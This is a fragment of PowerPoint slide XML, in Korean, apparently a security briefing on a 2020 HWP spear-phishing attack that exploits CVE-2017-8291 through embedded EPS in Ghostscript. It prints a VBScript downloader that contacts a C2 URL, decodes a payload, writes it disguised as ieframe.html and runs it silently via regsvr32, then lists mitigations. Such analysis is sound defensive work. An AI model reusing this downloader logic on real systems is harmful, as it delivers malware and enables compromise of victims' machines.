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HWP 스피어피싱 공격 분석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[조회]비트코인 투자 카페 강퇴&amp;활동정지 사례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공격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2020‑04‑29 악성 HWP 유포</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>취약점: CVE‑2017‑8291 (EPS PostScript 쉘코드 실행)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취약점 매커니즘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EPS(PostScript) 삽입 → Ghostscript type‑confusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>GetProcAddress → system 호출 → VBScript 실행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VBScript 다운로더 예제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latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Set xhr = CreateObject("Microsoft.XMLHTTP")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>Set shell = CreateObject("WScript.Shell")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>If Not Is64Bit Then WScript.Quit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xhr.Open "GET", C2_URL &amp; "?uid=" &amp; uid &amp; "&amp;udx=" &amp; HASH, False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>xhr.Send</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>payload = Base64Decode(BinaryToString(xhr.ResponseBody))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>path = shell.ExpandEnvironmentStrings("%APPDATA%") &amp; "\Microsoft\Internet Explorer\ieframe.html"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>WriteToFile path, payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr sz="1400">
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>shell.Run "regsvr32 /s " &amp; path, 0, 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공격 흐름도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914400" y="1371600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HWP 열기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249424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EPS 삽입 → 쉘코드 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Connector 5"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="914400" y="1737360.0"/>
            <a:ext cx="1828800" cy="877824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14400" y="3127248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VBScript 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Connector 7"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="914400" y="2615184.0"/>
            <a:ext cx="1828800" cy="877824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400" y="4005072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C2 통신</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Connector 9"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="914400" y="3493008.0"/>
            <a:ext cx="1828800" cy="877824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14400" y="4882896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페이로드 저장</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="914400" y="4370832.0"/>
            <a:ext cx="1828800" cy="877824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5760720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regsvr32 실행</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="914400" y="5248656.0"/>
            <a:ext cx="1828800" cy="877824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쉘코드 구조 예시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hellcod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 및 대응 방안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Ghostscript/HWP 최신 패치 적용</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>regsvr32 실행 제한 및 C2 URL 차단</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:t>정기적 보안 교육 및 모의 훈련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